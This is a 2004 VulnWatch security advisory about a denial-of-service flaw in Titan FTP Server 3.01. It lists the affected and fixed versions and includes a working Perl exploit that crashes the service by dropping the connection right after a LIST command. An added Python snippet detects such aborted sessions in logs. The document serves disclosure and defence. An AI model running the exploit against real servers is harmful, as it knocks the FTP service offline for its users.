[VulnWatch] Titan FTP Server Aborted LIST DoS

From: Aviram Jenik (aviram_at_beyondsecurity.com)
Date: 05/05/04

    To: vulnwatch@vulnwatch.org
    Date: Wed, 5 May 2004 15:51:35 +0300
    
    

     Titan FTP Server Aborted LIST DoS
    ----------------------------------------------------

    Article reference:
    http://www.securiteam.com/windowsntfocus/5RP0215CUU.html

    SUMMARY

    A security vulnerability exists in South River Technologies' Titan FTP Server.
    An attacker who issues a LIST command and disconnects before the LIST command
    has had time to connect will cause the program to try to access an invalid
    socket. This crashes the FTP service, which is then no longer able to
    service any additional users.

    DETAILS

    Vulnerable Systems:
      * Titan FTP Server version 3.01 build 163

     Immune Systems:
      * Titan FTP Server version 3.10 build 169

     Solution:
     To solve this issue upgrade to the latest version (3.10 build 169 or newer).

     Exploit:
     #!/usr/bin/perl
     # Test for Titan FTP server security vulnerability
     #
     # Orkut users? Come join the SecuriTeam community
     # http://www.orkut.com/Community.aspx?cmm=44441
     #
     use IO::Socket;

     $host = "192.168.1.243";

     my @combination;
     $combination[0] = "LIST \r\n";

     for (my $i = 0; $combination[$i] ; $i++)
     {
      print "Combination: $i\n";

      $remote = IO::Socket::INET->new ( Proto => "tcp",
          PeerAddr => $host,
          PeerPort => "2112",
          );
      unless ($remote) { die "cannot connect to ftp daemon on $host" }

      print "connected\n";
      while (<$remote>)
      {
       print $_;
       if (/220 /)
       {
        last;
       }
      }

      $remote->autoflush(1);

      my $ftp = "USER anonymous\r\n";

      print $remote $ftp;
      print $ftp;

      while (<$remote>)
      {
       print $_;
       if (/331 /)
       {
        last;
       }
      }

      $ftp = "PASS a\@b.com\r\n";
      print $remote $ftp;
      print $ftp;
      
      while (<$remote>)
      {
       print $_;
       if (/230 /)
       {
        last;
       }
      }
      
      $ftp = $combination[$i];

      print $remote $ftp;
      print $ftp;

      while (<$remote>)
      {
       print $_;
       if (/150 /)
       {
        last;
       }
      }

      # Drop the control connection as soon as the 150 reply arrives
      close $remote;
     }

    ADDITIONAL INFORMATION

    SecuriTeam would like to thank STORM <storm@securiteam.com> for
    finding this vulnerability.

    Regards,
    Aviram Jenik
    Beyond Security Ltd.

    http://www.BeyondSecurity.com
    http://www.SecuriTeam.com

    The First Integrated Network and Web Application Vulnerability Scanner:
    http://www.beyondsecurity.com/webscan-wp.pdf

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind.
    In no event shall we be liable for any damages whatsoever including direct,
    indirect, incidental, consequential, loss of business profits or special
    damages.
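
Seen from the server side, the exchange in the advisory is a control connection that closes right after LIST with no transfer-completion reply. The following is an added example, not part of the original advisory, that flags such sessions in a control-channel log; the log format, the `find_aborted_lists` name and the 2-second window are assumptions, and the sample lines are constructed.

```python
import re
from datetime import datetime

# Constructed sample in a hypothetical log format (not Titan's own):
# "<timestamp> <session-id> <client-ip> <direction> <text>"
SAMPLE_LOG = """\
2004-05-05 15:51:35.100 s17 203.0.113.9 > USER anonymous
2004-05-05 15:51:35.140 s17 203.0.113.9 > PASS ****
2004-05-05 15:51:35.180 s17 203.0.113.9 > LIST
2004-05-05 15:51:35.190 s17 203.0.113.9 < 150 Opening data connection
2004-05-05 15:51:35.195 s17 203.0.113.9 ! closed
2004-05-05 15:52:01.000 s18 198.51.100.4 > USER alice
2004-05-05 15:52:01.300 s18 198.51.100.4 > LIST
2004-05-05 15:52:01.320 s18 198.51.100.4 < 150 Opening data connection
2004-05-05 15:52:01.900 s18 198.51.100.4 < 226 Transfer complete
2004-05-05 15:52:09.000 s18 198.51.100.4 > QUIT
2004-05-05 15:52:09.010 s18 198.51.100.4 ! closed
"""

LINE = re.compile(r"^(\S+ \S+) (\S+) (\S+) ([<>!]) (.*)$")
DONE = ("226", "425", "426", "450", "451")  # replies that end a transfer

def find_aborted_lists(log_text, max_gap=2.0):
    """Return (session, client, gap_seconds) for each control connection
    that closed while a LIST was pending, within max_gap seconds."""
    pending = {}   # session id -> time the unanswered LIST was received
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        stamp, sess, client, direction, text = m.groups()
        when = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S.%f")
        if direction == ">" and text.split(" ")[0].upper() == "LIST":
            pending[sess] = when
        elif direction == "<" and text.startswith(DONE):
            pending.pop(sess, None)      # transfer finished or failed cleanly
        elif direction == "!" and text == "closed":
            started = pending.pop(sess, None)
            if started is not None:
                gap = (when - started).total_seconds()
                if gap <= max_gap:
                    hits.append((sess, client, round(gap, 3)))
    return hits

if __name__ == "__main__":
    for sess, client, gap in find_aborted_lists(SAMPLE_LOG):
        print(f"{sess} {client}: closed {gap}s after LIST, no completion reply")
```

A hit on a host still running 3.01 build 163 is a reason to check whether the FTP service is still up and to schedule the upgrade to 3.10 build 169 or newer.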

